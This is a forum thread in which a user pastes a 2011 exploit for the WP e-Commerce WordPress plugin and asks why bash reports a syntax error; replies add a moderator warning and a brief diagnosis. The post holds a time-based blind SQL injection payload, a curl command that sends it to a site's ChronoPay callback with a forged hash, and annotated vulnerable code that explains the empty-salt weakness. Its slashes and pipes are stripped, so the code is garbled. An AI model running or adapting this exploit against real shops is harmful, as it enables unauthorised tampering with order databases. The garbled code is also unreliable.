Syntax error near unexpected token `('

What do I do here?

#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload  md5sum  tr -d 'n'  sed 'ss-sg'  md5sum  tr -d 'n'  sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
 
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
 
    class WP_eCommerce {
 
        function WP_eCommerce() {
            add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
        }
 
        function init() {
            ...
            $this-load();
            ...
        }
        function load() {
            ...
            wpsc_core_load_gateways();
            ...
        }
    ...
    $wpec = new WP_eCommerce();
 
 
.wp-e-commercewpsc-corewpsc-functions.php
 
    function wpsc_core_load_gateways() {
        global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
 
        $gateway_directory      = WPSC_FILE_PATH . 'wpsc-merchants';
        $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
 
        $num = 0;
        foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
            if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
            }
 
 
.wp-e-commercewpsc-merchantschronopay.php
 
    function nzshpcrt_chronopay_callback()
    {
        ...
        if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
        {
            $salt = get_option('chronopay_salt');
             - this is by default '' and set only if explicitly stated
               inside Store Settings-Payments-General Settings-
               Chronopay-Edit-Security Key
             - problem is that there are more popular payment gateways enlisted (e.g.
               Google Checkout and PayPal) and if that setting is not explicitly set
               it wide opens the door to the potential attacker
 
            $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));   
             
            if($gen_hash == $_POST['cs3'])
            {
                ...
                $sessionid = trim(stripslashes($_POST['cs1']));
                $transaction_id = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
 
                switch($verification_data['trans_type'])
                {
                    ...
                    case 'rebill'
                        $wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
                                            `processed` = '2',
                                            `transactid` = '.$transaction_id.',
                                            `date` = '.time().'
                                        WHERE `sessionid` = .$sessionid. LIMIT 1);
    ...
    add_action('init', 'nzshpcrt_chronopay_callback');


# 1337day.com [2011-09-13]

---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------

Anyone?

Bumping up posts or double posting is not permitted in these forums.

Please read the rules, which you agreed to when you registered, if you have not already done so.

You may receive an infraction for this. If so, don't worry, just try to follow the rules more carefully. The infraction will expire in the near future

Thank You.

The UNIX and Linux Forums.

Let's assume that the first 4 lines of code posted are the entire bash script. Lines 1,3 and 4 of the post look like bash script. Line 2 is an alien syntax unlike bash, and produced the error message. Though lines 3 and 4 look like bash syntax the content does not stand up to superficial checking.

The rest is presumably three skeleton web programs unrelated to the bash script.